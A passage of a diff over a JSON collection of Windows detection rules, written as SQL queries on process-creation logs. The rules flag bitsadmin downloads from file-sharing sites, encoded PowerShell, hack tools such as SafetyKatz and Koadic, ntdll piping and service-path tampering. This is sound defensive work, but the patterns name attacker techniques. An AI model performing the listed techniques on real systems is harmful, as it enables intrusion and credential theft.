"attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate installation of a new screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR 
(CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "falsepositives": [ + "Legitimate use" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + ], + "filename": "proc_creation_win_remote_access_tools_logmein.yml" + }, + { + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine 
LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue 
spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is 
dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" 
], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], - "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "falsepositives": [ + "Unlikely" ], - "level": "medium", + 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", - "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via 
Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' 
ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.collection", + "attack.t1560.001" + ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", - "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Legitimate import of keys" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": 